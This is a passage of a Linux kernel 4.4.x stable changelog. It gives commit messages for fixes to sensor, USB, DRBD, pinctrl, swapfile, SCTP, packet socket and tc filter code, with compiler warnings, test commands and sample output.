Song Hongyan [Tue, 25 Oct 2016 01:06:03 +0000 (01:06 +0000)]
iio: orientation: hid-sensor-rotation: Add PM function (fix non working driver)
commit
8af644a7d6846f48d6b72be5d4a3c6eb16bd33c8 upstream.
This fix makes newer ISH hubs work. Previous ones worked by lucky
coincidence.
Rotation sensor function does not work due to miss PM function.
Add common hid sensor iio pm function for rotation sensor.
Further clarification from Srinivas:
If CONFIG_PM is not defined, then this prevents this sensor to
function. So above commit caused this.
This sensor was supposed to be always on to trigger wake up in prior
external hubs. But with the new ISH hub this is not the case.
Signed-off-by: Song Hongyan <hongyan.song@intel.com>
Fixes:
2b89635e9a9e ("iio: hid_sensor_hub: Common PM functions")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Song Hongyan [Tue, 25 Oct 2016 01:30:07 +0000 (01:30 +0000)]
iio: hid-sensors: Increase the precision of scale to fix wrong reading interpretation.
commit
6f77199e9e4b84340c751c585691d7642a47d226 upstream.
While testing, it was observed that on some platforms the scale value
from iio sysfs for gyroscope is always 0 (E.g. Yoga 260). This results
in the final angular velocity component values to be zeros.
This is caused by insufficient precision of scale value displayed in sysfs.
If the precision is changed to nano from current micro, then this is
sufficient to display the scale value on this platform.
Since this can be a problem for all other HID sensors, increase scale
precision of all HID sensors to nano from current micro.
Results on Yoga 260:
name scale before scale now
--------------------------------------------
gyro_3d 0.000000 0.
000000174
als 0.001000 0.
001000000
magn_3d 0.000001 0.
000001000
accel_3d 0.000009 0.
000009806
Signed-off-by: Song Hongyan <hongyan.song@intel.com>
Acked-by: Srinivas Pandruvada <srinivas.pandruvada@linux.intel.com>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Scott Wood [Mon, 17 Oct 2016 18:42:23 +0000 (13:42 -0500)]
clk: qoriq: Don't allow CPU clocks higher than starting value
commit
7c1c5413a7bdf1c9adc8d979521f1b8286366aef upstream.
The boot-time frequency of a CPU is considered its rated maximum, as we
have no other source of such information. However, this was previously
only used for chips with 80% restrictions on secondary PLLs. This
usually wasn't a problem because most chips/configs boot with a divider
of /1, with other dividers being used only for dynamic frequency
reduction. However, at least one config (LS1021A at less than 1 GHz)
uses a different divider for top speed. This was causing cpufreq to set
a frequency beyond the chip's rated speed.
This is fixed by applying a 100%-of-initial-speed limit to all CPU PLLs,
similar to the existing 80% limit that only applied to some.
Signed-off-by: Scott Wood <oss@buserror.net>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Azael Avalos [Thu, 25 Aug 2016 18:50:55 +0000 (12:50 -0600)]
toshiba-wmi: Fix loading the driver on non Toshiba laptops
commit
1c80e9603fe8341ed5bea696747d07083d5e0476 upstream.
Bug 150611 uncovered that the WMI ID used by the toshiba-wmi driver
is not Toshiba specific, and as such, the driver was being loaded
on non Toshiba laptops too.
This patch adds a DMI matching list checking for TOSHIBA as the
vendor, refusing to load if it is not.
Also the WMI GUID was renamed, dropping the TOSHIBA_ prefix, to
better reflect that such GUID is not a Toshiba specific one.
Signed-off-by: Azael Avalos <coproscefalo@gmail.com>
Signed-off-by: Darren Hart <dvhart@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Richard Weinberger [Wed, 9 Nov 2016 21:52:58 +0000 (22:52 +0100)]
drbd: Fix kernel_sendmsg() usage - potential NULL deref
commit
d8e9e5e80e882b4f90cba7edf1e6cb7376e52e54 upstream.
Don't pass a size larger than iov_len to kernel_sendmsg().
Otherwise it will cause a NULL pointer deref when kernel_sendmsg()
returns with rv < size.
DRBD as external module has been around in the kernel 2.4 days already.
We used to be compatible to 2.4 and very early 2.6 kernels,
we used to use
rv = sock_sendmsg(sock, &msg, iov.iov_len);
then later changed to
rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
when we should have used
rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);
tcp_sendmsg() used to totally ignore the size parameter.
57be5bd ip: convert tcp_sendmsg() to iov_iter primitives
changes that, and exposes our long standing error.
Even with this error exposed, to trigger the bug, we would need to have
an environment (config or otherwise) causing us to not use sendpage()
for larger transfers, a failing connection, and have it fail "just at the
right time". Apparently that was unlikely enough for most, so this went
unnoticed for years.
Still, it is known to trigger at least some of these,
and suspected for the others:
[0] http://lists.linbit.com/pipermail/drbd-user/2016-July/023112.html
[1] http://lists.linbit.com/pipermail/drbd-dev/2016-March/003362.html
[2] https://forums.grsecurity.net/viewtopic.php?f=3&t=4546
[3] https://ubuntuforums.org/showthread.php?t=
2336150
[4] http://e2.howsolveproblem.com/i/
1175162/
This should go into 4.9,
and into all stable branches since and including v4.0,
which is the first to contain the exposing change.
It is correct for all stable branches older than that as well
(which contain the DRBD driver; which is 2.6.33 and up).
It requires a small "conflict" resolution for v4.4 and earlier, with v4.5
we dropped the comment block immediately preceding the kernel_sendmsg().
Fixes:
b411b3637fa7 ("The DRBD driver")
Cc: viro@zeniv.linux.org.uk
Cc: christoph.lechleitner@iteg.at
Cc: wolfgang.glas@iteg.at
Reported-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Tested-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Signed-off-by: Richard Weinberger <richard@nod.at>
[changed oneliner to be "obvious" without context; more verbose message]
Signed-off-by: Lars Ellenberg <lars.ellenberg@linbit.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Felipe Balbi [Tue, 1 Nov 2016 11:20:22 +0000 (13:20 +0200)]
usb: gadget: u_ether: remove interrupt throttling
commit
fd9afd3cbe404998d732be6cc798f749597c5114 upstream.
According to Dave Miller "the networking stack has a
hard requirement that all SKBs which are transmitted
must have their completion signalled in a fininte
amount of time. This is because, until the SKB is
freed by the driver, it holds onto socket,
netfilter, and other subsystem resources."
In summary, this means that using TX IRQ throttling
for the networking gadgets is, at least, complex and
we should avoid it for the time being.
Reported-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Tested-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Suggested-by: David Miller <davem@davemloft.net>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Johan Hovold [Tue, 8 Nov 2016 12:10:57 +0000 (13:10 +0100)]
USB: cdc-acm: fix TIOCMIWAIT
commit
18266403f3fe507f0246faa1d5432333a2f139ca upstream.
The TIOCMIWAIT implementation would return -EINVAL if any of the three
supported signals were included in the mask.
Instead of returning an error in case TIOCM_CTS is included, simply
drop the mask check completely, which is in accordance with how other
drivers implement this ioctl.
Fixes:
5a6a62bdb925 ("cdc-acm: add TIOCMIWAIT")
Signed-off-by: Johan Hovold <johan@kernel.org>
Acked-by: Oliver Neukum <oneukum@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Marc Dietrich [Tue, 1 Nov 2016 12:59:40 +0000 (13:59 +0100)]
staging: nvec: remove managed resource from PS2 driver
commit
68fae2f3df455f53d0dfe33483a49020b3b758f3 upstream.
This basicly reverts commit
e534f3e9 (staging:nvec: Introduce the use of
the managed version of kzalloc). Serio struct should never by managed
because it is refcounted. Doing so will lead to a double free oops on module
remove.
Signed-off-by: Marc Dietrich <marvin24@gmx.de>
Fixes:
e534f3e9429f ("staging:nvec: Introduce the use of the managed version of kzalloc")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Paul Fertser [Thu, 27 Oct 2016 14:22:09 +0000 (17:22 +0300)]
Revert "staging: nvec: ps2: change serio type to passthrough"
commit
17c1c9ba15b238ef79b51cf40d855c05b58d5934 upstream.
This reverts commit
36b30d6138f4677514aca35ab76c20c1604baaad.
This is necessary to detect paz00 (ac100) touchpad properly as one
speaking ETPS/2 protocol. Without it X.org's synaptics driver doesn't
work as the touchpad is detected as an ImPS/2 mouse instead.
Commit
ec6184b1c717b8768122e25fe6d312f609cc1bb4 changed the way
auto-detection is performed on ports marked as pass through and made the
issue apparent.
A pass through port is an additional PS/2 port used to connect a slave
device to a master device that is using PS/2 to communicate with the
host (so slave's PS/2 communication is tunneled over master's PS/2
link). "Synaptics PS/2 TouchPad Interfacing Guide" describes such a
setup (PS/2 PASS-THROUGH OPTION section).
Since paz00's embedded controller is not connected to a PS/2 port
itself, the PS/2 interface it exposes is not a pass-through one.
Signed-off-by: Paul Fertser <fercerpav@gmail.com>
Acked-by: Marc Dietrich <marvin24@gmx.de>
Fixes:
36b30d6138f4 ("staging: nvec: ps2: change serio type to passthrough")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Paul Fertser [Thu, 27 Oct 2016 14:22:08 +0000 (17:22 +0300)]
drivers: staging: nvec: remove bogus reset command for PS/2 interface
commit
d8f8a74d5fece355d2234e1731231d1aebc66b38 upstream.
This command was sent behind serio's back and the answer to it was
confusing atkbd probe function which lead to the elantech touchpad
getting detected as a keyboard.
To prevent this from happening just let every party do its part of the
job.
Signed-off-by: Paul Fertser <fercerpav@gmail.com>
Acked-by: Marc Dietrich <marvin24@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Arnd Bergmann [Mon, 24 Oct 2016 15:22:01 +0000 (17:22 +0200)]
staging: iio: ad5933: avoid uninitialized variable in error case
commit
34eee70a7b82b09dbda4cb453e0e21d460dae226 upstream.
The ad5933_i2c_read function returns an error code to indicate
whether it could read data or not. However ad5933_work() ignores
this return code and just accesses the data unconditionally,
which gets detected by gcc as a possible bug:
drivers/staging/iio/impedance-analyzer/ad5933.c: In function 'ad5933_work':
drivers/staging/iio/impedance-analyzer/ad5933.c:649:16: warning: 'status' may be used uninitialized in this function [-Wmaybe-uninitialized]
This adds minimal error handling so we only evaluate the
data if it was correctly read.
Link: https://patchwork.kernel.org/patch/8110281/
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Mika Westerberg [Mon, 31 Oct 2016 14:57:33 +0000 (16:57 +0200)]
pinctrl: cherryview: Prevent possible interrupt storm on resume
commit
d2cdf5dc58f6970e9d9d26e47974c21fe87983f3 upstream.
When the system is suspended to S3 the BIOS might re-initialize certain
GPIO pins back to their original state or it may re-program interrupt mask
of others. For example Acer TravelMate B116-M had BIOS bug where certain
GPIO pin (MF_ISH_GPIO_5) was programmed to trigger on high level, and the
pin state was high once the BIOS gave control to the OS on resume.
This triggers lots of messages like:
irq 117, desc:
ffff88017a61e600, depth: 1, count: 0, unhandled: 0
->handle_irq():
ffffffff8109b613, handle_bad_irq+0x0/0x1e0
->irq_data.chip():
ffffffffa0020180, chv_pinctrl_exit+0x2d84/0x12 [pinctrl_cherryview]
->action(): (null)
IRQ_NOPROBE set
We reset the mask back to known state in chv_pinctrl_resume() but that is
called only after device interrupts have already been enabled.
Now, this particular issue was fixed by upgrading the BIOS to the latest
(v1.23) but not everybody upgrades their BIOSes so we fix it up in the
driver as well.
Prevent the possible interrupt storm by moving suspend and resume hooks to
be called at _noirq time instead. Since device interrupts are still
disabled we can restore the mask back to known state before interrupt storm
happens.
Reported-by: Christian Steiner <christian.steiner@outlook.de>
Signed-off-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Mika Westerberg [Mon, 31 Oct 2016 14:57:32 +0000 (16:57 +0200)]
pinctrl: cherryview: Serialize register access in suspend/resume
commit
56211121c0825cd188caad05574fdc518d5cac6f upstream.
If async suspend is enabled, the driver may access registers concurrently
with another instance which may fail because of the bug in Cherryview GPIO
hardware. Prevent this by taking the shared lock while accessing the
hardware in suspend and resume hooks.
Signed-off-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Vineet Gupta [Mon, 31 Oct 2016 21:09:52 +0000 (14:09 -0700)]
ARC: timer: rtc: implement read loop in "C" vs. inline asm
commit
922cc171998ac3dbe74d57011ef7ed57e9b0d7df upstream.
The current code doesn't even compile as somehow the inline assembly
can't see the register names defined as ARC_RTC_*
I'm pretty sure It worked when I first got it merged, but the tools were
definitely different then.
So better to write this in "C" anyways.
Acked-by: Daniel Lezcano <daniel.lezcano@linaro.org>
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Michael Holzheu [Tue, 25 Oct 2016 14:24:28 +0000 (16:24 +0200)]
s390/hypfs: Use get_free_page() instead of kmalloc to ensure page alignment
commit
237d6e6884136923b6bd26d5141ebe1d065960c9 upstream.
Since commit
d86bd1bece6f ("mm/slub: support left redzone") it is no longer
guaranteed that kmalloc(PAGE_SIZE) returns page aligned memory.
After the above commit we get an error for diag224 because aligned
memory is required. This leads to the following user visible error:
# mount none -t s390_hypfs /sys/hypervisor/
mount: unknown filesystem type 's390_hypfs'
# dmesg | grep hypfs
hypfs.cccfb8: The hardware system does not provide all functions
required by hypfs
hypfs.7a79f0: Initialization of hypfs failed with rc=-61
Fix this problem and use get_free_page() instead of kmalloc() to get
correctly aligned memory.
Signed-off-by: Michael Holzheu <holzheu@linux.vnet.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Andrey Ryabinin [Thu, 10 Nov 2016 18:46:38 +0000 (10:46 -0800)]
coredump: fix unfreezable coredumping task
commit
70d78fe7c8b640b5acfad56ad341985b3810998a upstream.
It could be not possible to freeze coredumping task when it waits for
'core_state->startup' completion, because threads are frozen in
get_signal() before they got a chance to complete 'core_state->startup'.
Inability to freeze a task during suspend will cause suspend to fail.
Also CRIU uses cgroup freezer during dump operation. So with an
unfreezable task the CRIU dump will fail because it waits for a
transition from 'FREEZING' to 'FROZEN' state which will never happen.
Use freezer_do_not_count() to tell freezer to ignore coredumping task
while it waits for core_state->startup completion.
Link: http://lkml.kernel.org/r/1475225434-3753-1-git-send-email-aryabinin@virtuozzo.com
Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
Acked-by: Pavel Machek <pavel@ucw.cz>
Acked-by: Oleg Nesterov <oleg@redhat.com>
Cc: Alexander Viro <viro@zeniv.linux.org.uk>
Cc: Tejun Heo <tj@kernel.org>
Cc: "Rafael J. Wysocki" <rjw@rjwysocki.net>
Cc: Michal Hocko <mhocko@kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Jann Horn [Thu, 10 Nov 2016 18:46:19 +0000 (10:46 -0800)]
swapfile: fix memory corruption via malformed swapfile
commit
dd111be69114cc867f8e826284559bfbc1c40e37 upstream.
When root activates a swap partition whose header has the wrong
endianness, nr_badpages elements of badpages are swabbed before
nr_badpages has been checked, leading to a buffer overrun of up to 8GB.
This normally is not a security issue because it can only be exploited
by root (more specifically, a process with CAP_SYS_ADMIN or the ability
to modify a swap file/partition), and such a process can already e.g.
modify swapped-out memory of any other userspace process on the system.
Link: http://lkml.kernel.org/r/1477949533-2509-1-git-send-email-jann@thejh.net
Signed-off-by: Jann Horn <jann@thejh.net>
Acked-by: Kees Cook <keescook@chromium.org>
Acked-by: Jerome Marchand <jmarchan@redhat.com>
Acked-by: Johannes Weiner <hannes@cmpxchg.org>
Cc: "Kirill A. Shutemov" <kirill.shutemov@linux.intel.com>
Cc: Vlastimil Babka <vbabka@suse.cz>
Cc: Hugh Dickins <hughd@google.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Sean Young [Thu, 10 Nov 2016 16:44:49 +0000 (17:44 +0100)]
dib0700: fix nec repeat handling
commit
ba13e98f2cebd55a3744c5ffaa08f9dca73bf521 upstream.
When receiving a nec repeat, ensure the correct scancode is repeated
rather than a random value from the stack. This removes the need for
the bogus uninitialized_var() and also fixes the warnings:
drivers/media/usb/dvb-usb/dib0700_core.c: In function ‘dib0700_rc_urb_completion’:
drivers/media/usb/dvb-usb/dib0700_core.c:679: warning: ‘protocol’ may be used uninitialized in this function
[sean addon: So after writing the patch and submitting it, I've bought the
hardware on ebay. Without this patch you get random scancodes
on nec repeats, which the patch indeed fixes.]
Signed-off-by: Sean Young <sean@mess.org>
Tested-by: Sean Young <sean@mess.org>
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
murray foster [Sun, 9 Oct 2016 20:28:45 +0000 (13:28 -0700)]
ASoC: cs4270: fix DAPM stream name mismatch
commit
aa5f920993bda2095952177eea79bc8e58ae6065 upstream.
Mismatching stream names in DAPM route and widget definitions are
causing compilation errors. Fixing these names allows the cs4270
driver to compile and function.
[Errors must be at probe time not compile time -- broonie]
Signed-off-by: Murray Foster <mrafoster@gmail.com>
Acked-by: Paul Handrigan <Paul.Handrigan@cirrus.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Takashi Iwai [Sun, 30 Oct 2016 21:18:45 +0000 (22:18 +0100)]
ALSA: info: Limit the proc text input size
commit
027a9fe6835620422b6713892175716f3613dd9d upstream.
The ALSA proc handler allows currently the write in the unlimited size
until kmalloc() fails. But basically the write is supposed to be only
for small inputs, mostly for one line inputs, and we don't have to
handle too large sizes at all. Since the kmalloc error results in the
kernel warning, it's better to limit the size beforehand.
This patch adds the limit of 16kB, which must be large enough for the
currently existing code.
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Takashi Iwai [Sun, 30 Oct 2016 21:13:19 +0000 (22:13 +0100)]
ALSA: info: Return error for invalid read/write
commit
6809cd682b82dfff47943850d1a8c714f971b5ca upstream.
Currently the ALSA proc handler allows read or write even if the proc
file were write-only or read-only. It's mostly harmless, does thing
but allocating memory and ignores the input/output. But it doesn't
tell user about the invalid use, and it's confusing and inconsistent
in comparison with other proc files.
This patch adds some sanity checks and let the proc handler returning
an -EIO error when the invalid read/write is performed.
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Greg Kroah-Hartman [Tue, 15 Nov 2016 06:47:35 +0000 (07:47 +0100)]
Linux 4.4.32
Sumit Saxena [Wed, 9 Nov 2016 10:59:42 +0000 (02:59 -0800)]
scsi: megaraid_sas: fix macro MEGASAS_IS_LOGICAL to avoid regression
commit
5e5ec1759dd663a1d5a2f10930224dd009e500e8 upstream.
This patch will fix regression caused by commit
1e793f6fc0db ("scsi:
megaraid_sas: Fix data integrity failure for JBOD (passthrough)
devices").
The problem was that the MEGASAS_IS_LOGICAL macro did not have braces
and as a result the driver ended up exposing a lot of non-existing SCSI
devices (all SCSI commands to channels 1,2,3 were returned as
SUCCESS-DID_OK by driver).
[mkp: clarified patch description]
Fixes:
1e793f6fc0db920400574211c48f9157a37e3945
Reported-by: Jens Axboe <axboe@kernel.dk>
Signed-off-by: Kashyap Desai <kashyap.desai@broadcom.com>
Signed-off-by: Sumit Saxena <sumit.saxena@broadcom.com>
Tested-by: Sumit Saxena <sumit.saxena@broadcom.com>
Reviewed-by: Tomas Henzl <thenzl@redhat.com>
Tested-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Alex Deucher [Wed, 11 May 2016 20:16:53 +0000 (16:16 -0400)]
drm/radeon: fix DP mode validation
commit
ff0bd441bdfbfa09d05fdba9829a0401a46635c1 upstream.
Switch the order of the loops to walk the rates on the top
so we exhaust all DP 1.1 rate/lane combinations before trying
DP 1.2 rate/lane combos.
This avoids selecting rates that are supported by the monitor,
but not the connector leading to valid modes getting rejected.
bug:
https://bugs.freedesktop.org/show_bug.cgi?id=95206
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Alex Deucher [Fri, 4 Mar 2016 00:26:24 +0000 (19:26 -0500)]
drm/radeon/dp: add back special handling for NUTMEG
commit
c8213a638f65bf487c10593c216525952cca3690 upstream.
When I fixed the dp rate selection in:
092c96a8ab9d1bd60ada2ed385cc364ce084180e
drm/radeon: fix dp link rate selection (v2)
I accidently dropped the special handling for NUTMEG
DP bridge chips. They require a fixed link rate.
Reviewed-by: Christian König <christian.koenig@amd.com>
Reviewed-by: Ken Wang <Qingqing.Wang@amd.com>
Reviewed-by: Harry Wentland <harry.wentland@amd.com>
Tested-by: Ken Moffat <zarniwhoop@ntlworld.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Alex Deucher [Wed, 11 May 2016 20:21:03 +0000 (16:21 -0400)]
drm/amdgpu: fix DP mode validation
commit
c47b9e0944e483309d66c807d650ac8b8ceafb57 upstream.
Switch the order of the loops to walk the rates on the top
so we exhaust all DP 1.1 rate/lane combinations before trying
DP 1.2 rate/lane combos.
This avoids selecting rates that are supported by the monitor,
but not the connector leading to valid modes getting rejected.
bug:
https://bugs.freedesktop.org/show_bug.cgi?id=95206
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Alex Deucher [Fri, 4 Mar 2016 00:34:28 +0000 (19:34 -0500)]
drm/amdgpu/dp: add back special handling for NUTMEG
commit
02d27234759dc4fe14a880ec1e1dee108cb0b503 upstream.
When I fixed the dp rate selection in:
3b73b168cffd9c392584d3f665021fa2190f8612
drm/amdgpu: fix dp link rate selection (v2)
I accidently dropped the special handling for NUTMEG
DP bridge chips. They require a fixed link rate.
Reviewed-by: Christian König <christian.koenig@amd.com>
Reviewed-by: Ken Wang <Qingqing.Wang@amd.com>
Reviewed-by: Harry Wentland <harry.wentland@amd.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
James Hogan [Thu, 15 Sep 2016 16:20:06 +0000 (17:20 +0100)]
KVM: MIPS: Drop other CPU ASIDs on guest MMU changes
commit
91e4f1b6073dd680d86cdb7e42d7cccca9db39d8 upstream.
When a guest TLB entry is replaced by TLBWI or TLBWR, we only invalidate
TLB entries on the local CPU. This doesn't work correctly on an SMP host
when the guest is migrated to a different physical CPU, as it could pick
up stale TLB mappings from the last time the vCPU ran on that physical
CPU.
Therefore invalidate both user and kernel host ASIDs on other CPUs,
which will cause new ASIDs to be generated when it next runs on those
CPUs.
We're careful only to do this if the TLB entry was already valid, and
only for the kernel ASID where the virtual address it mapped is outside
of the guest user address range.
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: "Radim Krčmář" <rkrcmar@redhat.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Cc: linux-mips@linux-mips.org
Cc: kvm@vger.kernel.org
Cc: <stable@vger.kernel.org> # 3.17.x-
[james.hogan@imgtec.com: Backport to 3.17..4.4]
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Greg Kroah-Hartman [Sun, 13 Nov 2016 11:16:15 +0000 (12:16 +0100)]
Revert KVM: MIPS: Drop other CPU ASIDs on guest MMU changes
This reverts commit
d450527ad04ad180636679aeb3161ec58079f1ba which was
commit
91e4f1b6073dd680d86cdb7e42d7cccca9db39d8 upstream as it was
incorrect. A fixed version will be forthcoming.
Reported-by: James Hogan <james.hogan@imgtec.com>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: "Radim Krčmář" <rkrcmar@redhat.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Stephen Rothwell [Mon, 30 May 2016 23:38:56 +0000 (09:38 +1000)]
of: silence warnings due to max() usage
commit
aaaab56dba9af4fe75461e0ee13231c1a6ea174d upstream.
pageblock_order can be (at least) an unsigned int or an unsigned long
depending on the kernel config and architecture, so use max_t(unsigned
long ...) when comparing it.
fixes these warnings:
In file included from include/linux/list.h:8:0,
from include/linux/kobject.h:20,
from include/linux/of.h:21,
from drivers/of/of_reserved_mem.c:17:
drivers/of/of_reserved_mem.c: In function ‘__reserved_mem_alloc_size’:
include/linux/kernel.h:748:17: warning: comparison of distinct pointer types lacks a cast
(void) (&_max1 == &_max2); \
^
include/linux/kernel.h:747:9: note: in definition of macro ‘max’
typeof(y) _max2 = (y); \
^
drivers/of/of_reserved_mem.c:131:48: note: in expansion of macro ‘max’
align = max(align, (phys_addr_t)PAGE_SIZE << max(MAX_ORDER - 1, pageblock_ord
^
include/linux/kernel.h:748:17: warning: comparison of distinct pointer types lacks a cast
(void) (&_max1 == &_max2); \
^
include/linux/kernel.h:747:21: note: in definition of macro ‘max’
typeof(y) _max2 = (y); \
^
drivers/of/of_reserved_mem.c:131:48: note: in expansion of macro ‘max’
align = max(align, (phys_addr_t)PAGE_SIZE << max(MAX_ORDER - 1, pageblock_ord
^
Fixes:
1cc8e3458b51 ("drivers: of: of_reserved_mem: fixup the alignment with CMA setup")
Signed-off-by: Stephen Rothwell <sfr@canb.auug.org.au>
Signed-off-by: Rob Herring <robh@kernel.org>
Cc: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Willem de Bruijn [Wed, 26 Oct 2016 15:23:07 +0000 (11:23 -0400)]
packet: on direct_xmit, limit tso and csum to supported devices
[ Upstream commit
104ba78c98808ae837d1f63aae58c183db5505df ]
When transmitting on a packet socket with PACKET_VNET_HDR and
PACKET_QDISC_BYPASS, validate device support for features requested
in vnet_hdr.
Drop TSO packets sent to devices that do not support TSO or have the
feature disabled. Note that the latter currently do process those
packets correctly, regardless of not advertising the feature.
Because of SKB_GSO_DODGY, it is not sufficient to test device features
with netif_needs_gso. Full validate_xmit_skb is needed.
Switch to software checksum for non-TSO packets that request checksum
offload if that device feature is unsupported or disabled. Note that
similar to the TSO case, device drivers may perform checksum offload
correctly even when not advertising it.
When switching to software checksum, packets hit skb_checksum_help,
which has two BUG_ON checksum not in linear segment. Packet sockets
always allocate at least up to csum_start + csum_off + 2 as linear.
Tested by running github.com/wdebruij/kerneltools/psock_txring_vnet.c
ethtool -K eth0 tso off tx on
psock_txring_vnet -d $dst -s $src -i eth0 -l 2000 -n 1 -q -v
psock_txring_vnet -d $dst -s $src -i eth0 -l 2000 -n 1 -q -v -N
ethtool -K eth0 tx off
psock_txring_vnet -d $dst -s $src -i eth0 -l 1000 -n 1 -q -v -G
psock_txring_vnet -d $dst -s $src -i eth0 -l 1000 -n 1 -q -v -G -N
v2:
- add EXPORT_SYMBOL_GPL(validate_xmit_skb_list)
Fixes:
d346a3fae3ff ("packet: introduce PACKET_QDISC_BYPASS socket option")
Signed-off-by: Willem de Bruijn <willemb@google.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Marcelo Ricardo Leitner [Tue, 25 Oct 2016 16:27:39 +0000 (14:27 -0200)]
sctp: validate chunk len before actually using it
[ Upstream commit
bf911e985d6bbaa328c20c3e05f4eb03de11fdd6 ]
Andrey Konovalov reported that KASAN detected that SCTP was using a slab
beyond the boundaries. It was caused because when handling out of the
blue packets in function sctp_sf_ootb() it was checking the chunk len
only after already processing the first chunk, validating only for the
2nd and subsequent ones.
The fix is to just move the check upwards so it's also validated for the
1st chunk.
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Jamal Hadi Salim [Tue, 25 Oct 2016 00:18:27 +0000 (20:18 -0400)]
net sched filters: fix notification of filter delete with proper handle
[ Upstream commit
9ee7837449b3d6f0fcf9132c6b5e5aaa58cc67d4 ]
Daniel says:
While trying out [1][2], I noticed that tc monitor doesn't show the
correct handle on delete:
$ tc monitor
qdisc clsact ffff: dev eno1 parent ffff:fff1
filter dev eno1 ingress protocol all pref 49152 bpf handle 0x2a [...]
deleted filter dev eno1 ingress protocol all pref 49152 bpf handle 0xf3be0c80
some context to explain the above:
The user identity of any tc filter is represented by a 32-bit
identifier encoded in tcm->tcm_handle. Example 0x2a in the bpf filter
above. A user wishing to delete, get or even modify a specific filter
uses this handle to reference it.
Every classifier is free to provide its own semantics for the 32 bit handle.
Example: classifiers like u32 use schemes like 800:1:801 to describe
the semantics of their filters represented as hash table, bucket and
